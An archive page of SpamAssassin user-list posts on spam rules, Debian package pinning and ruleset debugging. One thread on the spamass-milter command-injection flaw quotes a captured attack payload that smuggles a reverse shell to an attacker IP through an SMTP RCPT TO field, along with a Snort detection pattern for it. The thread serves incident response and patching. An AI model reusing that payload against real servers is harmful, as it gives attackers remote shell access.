On 02/18/2011 02:55 PM, Karsten Bräckelmann wrote:
 Way better. And actually a uri rule. :)  It's missing a bare domain URI,
 though. The end of the domain part sub-RE alternatively should accept
 the end of the string.
 
   / ... \.info(?:[/:?#]|$)/

If you're going to nit-pick, I'll correct its other minor bugs too:

header __TD_DEB_LISTList-Id =~ /debian-user\.lists\.debian\.org/
uri__TD_DOT_INFOm'^http://[^/:?#]*\.info(?:[/:?#]|$)'i

:-p



signature.asc
Description: OpenPGP digital signature


Re: Tonns of russian DOT info spam

2011-02-18 Thread Adam Katz
 Ah, good one. Though unfortunately, and I hate to admit that, both our
 rules will never match. The # hash needs to be escaped... *sigh*
 
   [/:?\#]
 
 Or just ignore it by leaving it out. It's pretty rare, anyway.

Hash (#), like At (@) and sometimes Dollar ($), has an inconsistent
behavior of the SA parser.  When in doubt, escape it, but I believe it
is correctly parsed when delimited with m''

The issue with $ is moot in m//, but m'foo$' and several other
punctuation-based delimiters trigger various obscure perl variables,
which I believe include  $'  $  $`  $+   ... A workaround is to use \Z
(which is usually the same thing) or (?:$) or a different delimiter.



signature.asc
Description: OpenPGP digital signature


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-14 Thread Adam Katz
On 02/12/2011 05:19 PM, Sahil Tandon wrote:
 On Fri, 2011-02-11 at 12:08:35 -0800, Adam Katz wrote:
 
 I consider it a mission-critical component to be able to deliver a
 rejection notice at SMTP-time (to avoid backscatter from an emailed
 bounce message).  The other systems out there (specifically amavis and
 mailscanner) just can't do this while spamass-milter does it with very
 little overhead or configuration.
 
 For posterity, and to hopefully prevent the spread of misinformation via
 list archives, the above (specifically with regard to amavisd-new) is
 patently false.

Thanks for the correction to Mark, Henrik, and Sahil.  I did not know
that.  I also did not know about amavisd-milter.  These either weren't
around a few years ago or they were not found when I researched this
(including questions to irc.freenode.com#amavisd or whatever that
channel is named).

My apologies, I was not trying to propagate misinformation.



signature.asc
Description: OpenPGP digital signature


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-11 Thread Adam Katz
On 02/11/2011 03:39 AM, Giles Coochey wrote:
 Under CentOS spamass-milter appears to run as sa-milt.

IIRC, Debian does this too.  However, the -x flag may require running as
root, so it is possible (I have not verified) that it never downgrades
its privileges.

 The Vulnerability is only active if the milter is run with the '-x' 
 expand (for virtusertable / alias expansion) option.

Correct.

 While the project page is inactive, the distribution packages of 
 spamass-milter often contain unofficial patches which expand its 
 features, and wouldn't surprise me if they also fix this
 vulnerability.

They did.  That fix was also supposed to go upstream but accidentally
did not.

 Anyone know whether the CentOS one is vulnerable?
 
 Name   : spamass-milter
 Arch   : i386
 Version: 0.3.1
 Release: 24.rhel5

You are all set.

RHEL release 0.3.1-17 introduced the fix.  0.3.1-19 includes a related
zombie process fix (CVE-2010-1132).  See changelog in:
http://rpmfind.net//linux/RPM/fedora/devel/rawhide/i386/spamass-milter-0.3.1-24.fc15.i686.html#Changelog



signature.asc
Description: OpenPGP digital signature


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-11 Thread Adam Katz
On 02/10/2011 03:41 PM, Warren Togami Jr. wrote:
 On 2/10/2011 1:29 PM, John Hardin wrote:
 I suppose we ought to compose a boilerplate response for the
 inevitable visitors who will show up asking about this exploit in
 SpamAssassin...
 
 Perhaps more than boilerplate, but rather an official advisory to
 clear up the confusion?  Given that upstream of that milter is dead,
 nobody else will make an official advisory?

This came from an accidental lost checkin that has since been fixed.
There is little activity on the spamass-milter project because it
doesn't need anything; almost all updates go to SA and the MTAs rather
than the milter.

As noted by Robert Schetterer, postfix doesn't allow this syntax
anymore.  As Giles Goochey forwarded from the sa-milter list, maintainer
Dan Nelson has committed the patch to CVS and will officially release
the fix this weekend.  I'm one of several people who have mentioned that
this is fixed in both Fedora- and Debian- derived systems.

There appears to be a communication issue between these two lists; once
I connected the SA list to the SA-milter list, the issue got resolved in
very quick order.  SA-milter is still one of the best methods for
invoking SA from sendmail or postfix.

I consider it a mission-critical component to be able to deliver a
rejection notice at SMTP-time (to avoid backscatter from an emailed
bounce message).  The other systems out there (specifically amavis and
mailscanner) just can't do this while spamass-milter does it with very
little overhead or configuration.

I've considered working on boosting the support for SA in
milter-greylist (my C is 5-10+ years rusty and my free time is sparse),
but most people have a hard time understanding that you can use that
milter without greylisting -- it does all sorts of useful things at
SMTP-time (before and after DATA), including SPF, DKIM, DNSBLs,
tarpitting, spamassassin (limited), p0f, and greylisting.

Notes on SA support in Milter-Greylist:
http://tech.groups.yahoo.com/group/milter-greylist/message/5621
(Tip for evading Yahoo's cookies: set UserAgent to Googlebot/2.1)



signature.asc
Description: OpenPGP digital signature


Re: channel 70_zmi_german.cf.zmi.sa-update.dostech.net update?

2011-02-11 Thread Adam Katz
On 02/11/2011 06:53 AM, Bowie Bailey wrote:
 The khop rules should probably be added to that list.

 The only official site I could find referencing these rules is 
 http://khopesh.com/wiki/Anti-spam (under the sa-update channels 
 heading), but this also has some out of date information regarding
 the SARE rules.

The 2tld stuff, yeah.  I need to note that that's not useful in
sa3.3.0+.  I'm pretty sure everything is otherwise up to date.



signature.asc
Description: OpenPGP digital signature


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Adam Katz
Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
 if case you are using spamassassin milter:
 
 active exploits going on.
 
 http://seclists.org/fulldisclosure/2010/Mar/140
 http://www.securityfocus.com/bid/38578
 
 Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
 
 I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
 Aieee popen() in security-sensitive software!??!??
 
 Also, why does the milter process run as root?  That seems like a huge
 hole all by itself.


Does this affect sendmail as well as postfix?  I assume so, but wanted
an explicit confirmation.  (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)
---BeginMessage---

heads up:

if case you are using spamassassin milter:

active exploits going on.

http://seclists.org/fulldisclosure/2010/Mar/140
http://www.securityfocus.com/bid/38578

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


 Original Message 
Subject: 	RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt












The rule is only looking for this:

content:to|3A|; depth:10; nocase; content:+|3A|\|7C|;

Personally, I would probably block it.  Although, if we're not seeing 
this sort of thing pop up on customer's boxes, a manual block in 
scanner2 is sufficient for now, right?


Either way, let me know and I'll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


is the snort rule specific enough that you can block the offending ip 
for 5 mins?


(if its a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this.  I blocked that IP with samtool.

Payload:

rcpt to: root+:|exec /bin/sh 0/dev/tcp/87.106.250.176/45295 10 20

data

.

quit

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-al...@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


02/10-12:00:59 trust1 TCP 62.206.228.188:56691 -- 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote 
Arbitrary Command Injection Attempt

[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300

*| *SECNAP Network Security Corporation


·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008


__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/

__  ---End Message---


signature.asc
Description: OpenPGP digital signature


FIX for ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Adam Katz
On 02/10/2011 09:42 AM, Michael Scheidell wrote:
 active exploits going on.
 
 http://seclists.org/fulldisclosure/2010/Mar/140
 http://www.securityfocus.com/bid/38578
 
 Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
 
 I don't see anything on bugtraq about a fix.

The fix (to use popenenv in place of popen) has been noted on the
spamass-milter list.  It was released downstream by both Red Hat and
Debian in March 2010:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573228

I've attached the current diff from Debian (note it includes everything,
including the debian/ subdirectory, rather than just that one issue).


... Why is Amavis here for the ride?  They don't use spamass-milter!


spamass-milter_0.3.1-10.diff.gz
Description: GNU Zip compressed data


signature.asc
Description: OpenPGP digital signature


Re: Updated rules are not regarded

2010-06-04 Thread Adam Katz
On 05/29/2010 05:03 AM, Yves Goergen wrote:
 Stepping away from the ZMI issue and headig towards the larger 
 picture, what kind of spam are you trying to nail down with this 
 ruleset?  What goals did you hope to meet with the ZMI rules?  If
 it's a specific type of spam, can you pastebin an example so we
 can help you more directly?
 
 I have submitted a couple of those spam messages to the ruleset 
 maintainer, but I'm not sure if it helps. I can repost it here if
 you like to see it. (ZIP 48 kB)

If they're evading bayes and other filters, they might be worth a
look.  I can take a look at them if you post them to pastebin.com or a
similar site and then send me links (this is the best way to avoid
spam filters on the list, etc).

 Are you using Bayes?  Are you training it?
 
 Yes. Yes. I'm only training it with spam messages though. I assume
 it autolearns all the rest. But the bayes filter is absolutely
 useless to me, it most often rates spam 0-1%, even for repeatedly
 learned spam messages. Maybe I should erase the bayes brain and
 restart from new?

Bayes won't work unless you have lots of both spam and ham.  Autolearn
is apparently not doing its job if most of your spams hit 0-1%.  Try
teaching it everything you have.  If you're that out of whack, it
might be worthwhile to start from scratch as you suggested.

 Most people who want to improve their deployment's SA filters
 aren't properly utilizing the various plugins.  Specifically,
 DNSBLs, URIBLs, and Bayes, but also things like Razor2, DCC (if
 legal), and Pyzor.
 
 The very most helpful plugin to me is Botnet. It detects most spam
 and rates 5 points which is often a big step towards rejection.

I've heard good things about Botnet, though most of its dynamic checks
appear to already be folded into SA's trunk (I've actually got some
detection rules in there that are more sophisticated but are not yet
done cooking).

That said, the dynamic detection bits like Botnet should pale in
comparison to any one of: DNSBLs, URIBLs, Bayes, Razor2, DCC, and
Pyzor.  Almost every case I encounter with this sort of help me make
SA filter better ends up being a misconfiguration of some or all of
those things.

 Most other SA rules don't detect anything although I'm running
 sa-update daily and it reports an update every some weeks. Only the
 DNSBL rules apply every once in a while - at least to what is
 passing the filter. I haven't investigated what's been blocked
 successfully. I think I've still installed the Image Info thing
 plugin but I don't think it catches anything these days. Image spam
 seems to be over.

DNSBLs do a good job; you're probably not noticing them because
anything they nail gets hit pretty hard by several rules and thus
probably hits your block threshold.

Image spam comes and goes.  Third party plugins like iXhash can help.

 Upgrading to SA 3.3.1 would be a big step up if you're not there 
 already (if you can't, you might want to consider a back-port of
 the better DNSBLs to SA 3.2.x like my khop-bl channel).
 
 I need to upgrade to SA 3.3, true. It's always been a hassle
 somewhere between CPAN, other disfunctional Perl junk, source code
 and Debian packages... It's a very complicated job. I'm also
 considering setting up the entire machine anew on Ubuntu basis and
 only use platform packages but that's not something I can do in the
 near future.

Messing with CPAN will work, but might feel daunting, especially if
you've never done it before.  It also introduces an additional thing
to keep track of.  For Debian, I recommend the volatile and backports
repositories.  Go to www.backports.org and add lenny-backports, then
pin it to a low priority and un-pin spamassassin.


Package: *
Pin: release a=lenny-backports
Pin-Priority: 150

Package: spamassassin
Pin: release a=lenny-backports
Pin-Priority: 500


I've also got testing and unstable pinned even lower at 1 and -1, but
that's up to you.  500 is the default pin, 101-500 will upgrade a
manually-installed newer package if there is a candidate, 1-100 will
install candidates if higher pin versions are missing, and lower pins
are never installed.  See the man page for apt_preferences for detail.


# apt-cache policy spamassassin
spamassassin:
  Installed: 3.2.5-2+lenny1.1~volatile1
  Candidate: 3.3.1-1~bpo50+1
  Package pin: 3.3.1-1~bpo50+1
  Version table:
 3.3.1-1 500
  1 http://debian.lcs.mit.edu/debian/ squeeze/main Packages
 -1 http://debian.lcs.mit.edu/debian/ unstable/main Packages
 3.3.1-1~bpo50+1 500
150 http://www.backports.org lenny-backports/main Packages
 3.2.5-2+lenny2 500
500 http://debian.lcs.mit.edu/debian/ lenny/main Packages
 3.2.5-2+lenny1.1~volatile1 500
500 http://volatile.debian.org lenny/volatile/main Packages
# aptitude install spamassassin
...


Re: Yerp connection issues

2010-05-26 Thread Adam Katz
On 05/26/2010 07:32 PM, John Hardin wrote:
 On Wed, 26 May 2010, Karsten Br�ckelmann wrote:
 
 The correct answer to both these statements is -- because it is in the
 mirrors list. ;)

 $ lynx -dump http://yerp.org/rules/MIRRORED.BY
 http://yerp.org:8080/rules/stage/ weight=10
 http://yerp.org/rules/stage/
 
 ...a botched attempt to set up Coral caching? It seems to me that should
 probably be:
 
  http://yerp.org.nyud.net:8080/rules/stage/ weight=10
  http://yerp.org/rules/stage/

I do not suggest that.  Coral Cache does not play nicely with sa-update
from my experiences (I seem to recall Justin saying the same a while ago).

Since yerp is Justin's, I presume it's a different sort of experiment.


Re: Updated rules are not regarded

2010-05-25 Thread Adam Katz
Please note that the ZMI German rules are very old, and while there
have been a few recent tweaks to the file, it doesn't look terribly
useful to any system that uses the Bayesian filter (more on this
later).  I would expect these rules to fire quite rarely, even in
environments that have lots of German-language mail.


Yves added ZMI via sa-update channels.  He confirmed its presence in
the correct area but wants to confirm it can run.

This command will tell you if SA is properly loading the configuration
file (this should note loading the ZMI rules):

  spamassassin --lint -D config 21 |grep zmi_german

You can run lint without debug to see if SA takes issue with any of
the rules (no output means you're good):

  spamassassin --lint

Next, let's see if the rules are ever triggering.  This is merely a
question of filtering your logs (assuming SA is properly logged).

To do this, we'll first verify that there is the expected data your
logs and see how many messages SA scanned in this sampling period:

  zgrep -c 'spamd: result:' /var/log/mail.log*

Now let's look for rules from ZMI.  Since this rule set uses a common
prefix for all rules, this is an easy search:

  zgrep -c spamd: result: .*ZMI /var/log/mail.log*

I expect the results of the last two scans to be a very high number
for the total scanned message count and then a very low number (like
zero) for the ZMI-hitting message count.


For completeness, here's how to actually grab rules by name (in any
posix/bourne shell like bash but not like tcsh):

  RULES=`egrep '^ *score' 70_zmi_german.cf |awk '{printf $2|}'`

  zgrep -c spamd: result: .*(${RULES%?}) /var/log/mail.log*


Finally, if you believe that the rules are being ignored, you can
compose a test to see if that is actually the case.  Take a *full*
sample spam and feed it into SA with a replaced subject as a test:

  formail -I Subject: NLP Profis  message.txt |spamassassin -t

You should see (among other things) a line noting that
ZMIde_SUBNLP_PROFI has been hit.


Stepping away from the ZMI issue and headig towards the larger
picture, what kind of spam are you trying to nail down with this
ruleset?  What goals did you hope to meet with the ZMI rules?  If it's
a specific type of spam, can you pastebin an example so we can help
you more directly?

Returning to my initial statement, I am under the impression that this
channel is useful only to victims of German spams who do not use
Bayes.  From a quick examination of the rules, it appears to be mostly
geared at SA implementations that cannot run Bayesian filters since
Bayes should be fully capable of grabbing ALL of those rules (possibly
excepting ZMISOBER_P_SPAM due to its examination of several non-word
elements) ... and Bayes should do a better job, too.

Are you using Bayes?  Are you training it?

Most people who want to improve their deployment's SA filters aren't
properly utilizing the various plugins.  Specifically, DNSBLs, URIBLs,
and Bayes, but also things like Razor2, DCC (if legal), and Pyzor.
Upgrading to SA 3.3.1 would be a big step up if you're not there
already (if you can't, you might want to consider a back-port of the
better DNSBLs to SA 3.2.x like my khop-bl channel).

Testing on a piece of spam:

  spamassassin -D  msg.txt  debug.txt 21

Should reveal (among MANY other lines) output similar to this:

[5841] dbg: async: completed in 0.240 s: DNSBL-A,
dns:A:107.49.73.222.zen.spamhaus.org.

[5841] dbg: async: completed in 0.249 s: URI-DNSBL,
DNSBL:multi.uribl.com.:www.net.cn

[5841] dbg: bayes: score = 1

[5841] dbg: razor2: results: spam? 1

[5841] dbg: pyzor: got response: public.pyzor.org:24441 (200, 'OK') 4 0

[5841] dbg: dcc: dccifd got response: X-DCC-SIHOPE-DCC-3-Metrics:
guardian.ics.com 1085; Body=1 Fuz1=many Fuz2=many


This hit all those flags because I tested on a spam previously run
through 'spamassassin -r' (which teaches Bayes and reports to razor2
and others) ... you should still see results, even if they are ham.
The thing you want in this test is just successful connections to the
servers rather than the spam/ham results.


Re: yahoo X-YMail-OSG

2010-05-24 Thread Adam Katz
My original rule:
 header   SINGLE_HEADER_2K  ALL:raw =~ /^(?=.{2048,3071}$)/m

Karsten Bräckelmann noted:
 It does not match a single header, let alone a *specific*
 header as the one mentioned, but ALL headers. It effectively
 checks the entire headers' size.

Karsten then corrected himself:
 Err, nope -- the size between the beginning and end of a line.

Yup, my test was a single-line header.  Fixed.

header   SINGLE_HEADER_2K   ALL:raw =~
  /(?-xim:(?=(?:^|\n)[^\s\n]+:(?:.(?!\n\S)){2048,3071}.(?:\n\S|$)))/s

Perhaps a regexp efficiency expert should clean it up ... the large
match in the middle using (?:.(?!\n\S)){2048,3071} to keep within a
single header might not be so hot on the PCRE parser; that's a LOT of
looking ahead.  Maybe (?!.{0,2048}\n\S).{2048} and then use meta
rules to exclude larger hits?

 Being the one credited with suggesting it, I would rather just look
 at the X-Ymail-OSG header. I can EASILY get my MTA to block (at the
 gateway) any email with a random header  x in size.
 
 if X-Ymail-OSG is  1024 bytes, its just about guaranteed to be
 spam.

Yes, I just wanted to see what examining /any/ header for that kind of
thing would look like.  I've add tests specific to that so we don't
get bogged down waiting for results.

header   MS_XYMOSG_1K   X-YMail-OSG =~ /^(?=.{1024,2047}$)/s
header   MS_XYMOSG_2K   X-YMail-OSG =~ /^(?=.{2048,3071}$)/s
header   MS_XYMOSG_3K   X-YMail-OSG =~ /^(?=.{3072,4095}$)/s
header   MS_XYMOSG_4K   X-YMail-OSG =~ /^(?=.{4096,5119}$)/s
header   MS_XYMOSG_5K   X-YMail-OSG =~ /^(?=.{4096})/s

(I fully expect these to all fold into one or two rules, but it's nice
to see where things sit beforehand.)

Committed revision 947854.


  1   2   3   >